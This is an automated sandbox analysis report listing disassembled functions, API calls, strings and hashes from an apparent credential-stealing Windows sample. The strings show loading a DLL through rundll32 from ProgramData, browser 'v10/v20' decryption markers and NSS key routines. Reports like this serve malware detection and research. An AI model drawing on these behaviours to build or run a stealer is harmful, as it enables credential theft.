                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                          • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          • API String ID: 2215929589-2108736111
                                                                                                                                                                                          • Opcode ID: c1761fe5f48d2ce9dcdc228376bebc18905f8784f6c644b4d02dee0153601d60
                                                                                                                                                                                          • Instruction ID: 5e0dac0734968aa3d73cdcf8e6d7df18c11d662eff3886030000dc4322d79ff9
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1761fe5f48d2ce9dcdc228376bebc18905f8784f6c644b4d02dee0153601d60
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25719972D11529EBCF12EFA4EC526DEB7B8AF04300F514161F910B7157DB31AE4A8B90
                                                                                                                                                                                          Function 6C43D468 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: GetCurrentProcess.KERNEL32(?,6C4131A7), ref: 6C44CBF1
                                                                                                                                                                                            • Part of subcall function 6C44CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4131A7), ref: 6C44CBFA
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D4F2
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D50B
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: EnterCriticalSection.KERNEL32(6C49E784), ref: 6C41CFF6
                                                                                                                                                                                            • Part of subcall function 6C41CFE0: LeaveCriticalSection.KERNEL32(6C49E784), ref: 6C41D026
                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D52E
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49E7DC), ref: 6C43D690
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C44D1C5), ref: 6C43D751
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global., xrefs: 6C43D793
                                                                                                                                                                                          • MOZ_CRASH(), xrefs: 6C43D4BB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                          • String ID: MOZ_CRASH()$lesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" ><link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.
                                                                                                                                                                                          • API String ID: 3805649505-3957914486
                                                                                                                                                                                          • Opcode ID: 1b66d2f7f8d350ffc5486c4bb40330d66a6b8d6e47b6cfefa3f0393c1ecf4ecf
                                                                                                                                                                                          • Instruction ID: 3c0afbbbc939b8c57e8617fb21f7d2646cc62e637575d8ca04d99be2e240f355
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b66d2f7f8d350ffc5486c4bb40330d66a6b8d6e47b6cfefa3f0393c1ecf4ecf
                                                                                                                                                                                          • Instruction Fuzzy Hash: E451B271A047618FE768DF29C094F1ABBF1EB89714F24892EE5A9C7B44D770E804CB91
                                                                                                                                                                                          Function 0002826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00028307
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0002833C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocLocal_memset
                                                                                                                                                                                          • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                                                                                                          • API String ID: 52611349-380572819
                                                                                                                                                                                          • Opcode ID: 2c274cfd2e9febf22bbd03126866f5847828f0fa6f2db684494d6a82c551b0ac
                                                                                                                                                                                          • Instruction ID: c8cd87e5fabe91b5c1939db2dda1626fbfce760126d92dfb1f0bf6d2ad8d61c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c274cfd2e9febf22bbd03126866f5847828f0fa6f2db684494d6a82c551b0ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641E3B6A01128ABCF10DFB9EC469DF3BB8AF44714F158121FD04E7281EB70DA498B90
                                                                                                                                                                                          Function 6C44F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C44F480
                                                                                                                                                                                            • Part of subcall function 6C41F100: LoadLibraryW.KERNEL32(shell32,?,6C48D020), ref: 6C41F122
                                                                                                                                                                                            • Part of subcall function 6C41F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C41F132
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6C44F555
                                                                                                                                                                                            • Part of subcall function 6C4214B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C421248,6C421248,?), ref: 6C4214C9
                                                                                                                                                                                            • Part of subcall function 6C4214B0: memcpy.VCRUNTIME140(?,6C421248,00000000,?,6C421248,?), ref: 6C4214EF
                                                                                                                                                                                            • Part of subcall function 6C41EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C41EEE3
                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 6C44F4FD
                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C44F523
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                          • String ID: \oleacc.dll
                                                                                                                                                                                          • API String ID: 2595878907-3839883404
                                                                                                                                                                                          • Opcode ID: 544192fd322e528ea214a8ce08e0b4f96745839d4cbe0852b406bcd6fe3a729e
                                                                                                                                                                                          • Instruction ID: d2cd753951dc580c73d86286f74a25120a09c03d8ec653dd9950377449dd03df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 544192fd322e528ea214a8ce08e0b4f96745839d4cbe0852b406bcd6fe3a729e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 624191306097509FF720DF68C884F9AB7F4EF45329F204A1CE59583651EB70E9498B92
                                                                                                                                                                                          Function 6C5A6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C5A6E36
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A6E57
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C5A6E7D
                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C5A6EAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                          • String ID: ndl
                                                                                                                                                                                          • API String ID: 3163584228-3837407192
                                                                                                                                                                                          • Opcode ID: 017c48020819c180f88961790c409d8d7a30c1a90587b05af8af50a219907405
                                                                                                                                                                                          • Instruction ID: 909a2b6846e31fd868f69606c1e566d0aef8b02ac383878f1d65616b8932dded
                                                                                                                                                                                          • Opcode Fuzzy Hash: 017c48020819c180f88961790c409d8d7a30c1a90587b05af8af50a219907405
                                                                                                                                                                                          • Instruction Fuzzy Hash: A931C532610712EEDB145EB9CD1439BB7A4AB4131AF100A3CD4A9D6B80EF30795ACF81
                                                                                                                                                                                          Function 0002F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F2C7
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F2E6
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0002F320
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                                          • API String ID: 3404309857-4289949731
                                                                                                                                                                                          • Opcode ID: cd466762159831fe5900563ea07a17d3e32b6bba1e7fd6cf3dc1658210c6f01d
                                                                                                                                                                                          • Instruction ID: ddddb0d2d7fbb311b63de4ac1ec82dcd4a75a26f815685a421948a6c4249c299
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd466762159831fe5900563ea07a17d3e32b6bba1e7fd6cf3dc1658210c6f01d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA119E71300213AF9B04EF68E885AAAB3B5BF013A07500579F516CB282C770EA458794
                                                                                                                                                                                          Function 6C520DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C520BDE), ref: 6C520DCB
                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C520BDE), ref: 6C520DEA
                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C520BDE), ref: 6C520DFC
                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C520BDE), ref: 6C520E32
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C520E2D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                          • Opcode ID: 96bfd52938b7e4cc8341ac4b1ff5d8e5c82b7bf8b024021eb61acaac6b2f19c9
                                                                                                                                                                                          • Instruction ID: e157ad43a78c37b165cf0ba10ddb940d95b323de7498361e69bb3a546054a77e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 96bfd52938b7e4cc8341ac4b1ff5d8e5c82b7bf8b024021eb61acaac6b2f19c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68012871B01210AFE720DF259C85E17B3FCDF86608B04882ED905D7A81E762EC1486E5
                                                                                                                                                                                          Function 6C5DAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]\l,00000000,?,?,6C5B6AC6,?), ref: 6C5DAC2D
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE10
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: EnterCriticalSection.KERNEL32(?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE24
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C55D079,00000000,00000001), ref: 6C57AE5A
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE6F
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AE7F
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: TlsGetValue.KERNEL32(?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEB1
                                                                                                                                                                                            • Part of subcall function 6C57ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C55CDBB,?,6C55D079,00000000,00000001), ref: 6C57AEC9
                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]\l,00000000,?,?,6C5B6AC6,?), ref: 6C5DAC44
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]\l,00000000,?,?,6C5B6AC6,?), ref: 6C5DAC59
                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C5B6AC6,?,?,?,?,?,?,?,?,?,?,6C5C5D40,00000000,?,6C5CAAD4), ref: 6C5DAC62
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                          • String ID: @]\l
                                                                                                                                                                                          • API String ID: 1595327144-2352874985
                                                                                                                                                                                          • Opcode ID: 9e2748a9e01f223e6e967d315791181bfc0d19bba23429f967cc1c293d56b20a
                                                                                                                                                                                          • Instruction ID: 9f7fac823ddb7ab53f38e4931c9e2a50438faea555273095fdc4170afe732f55
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e2748a9e01f223e6e967d315791181bfc0d19bba23429f967cc1c293d56b20a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D80178B56012009FEB10CF19EDC0B4677A8AB54B28F188068E8098F706D735F848CBB1
                                                                                                                                                                                          Function 6C47C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,6C47C0E9), ref: 6C47C418
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C47C437
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,6C47C0E9), ref: 6C47C44C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                          • API String ID: 145871493-2623246514
                                                                                                                                                                                          • Opcode ID: 8f8db413c0f21ca7fefe0c0da4f86ed71daefb955fde98f534ff540553e35ecc
                                                                                                                                                                                          • Instruction ID: 994f31273199068ee0937ca5f7ca63981a1018e4cab350f53c4df44a65c53c08
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8db413c0f21ca7fefe0c0da4f86ed71daefb955fde98f534ff540553e35ecc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E0B6706127219BFFA0FF72D908F157FFCA7A6245F10411AFA0491701EBB0C0108B60
                                                                                                                                                                                          Function 000292A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000294AB
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000294C6
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
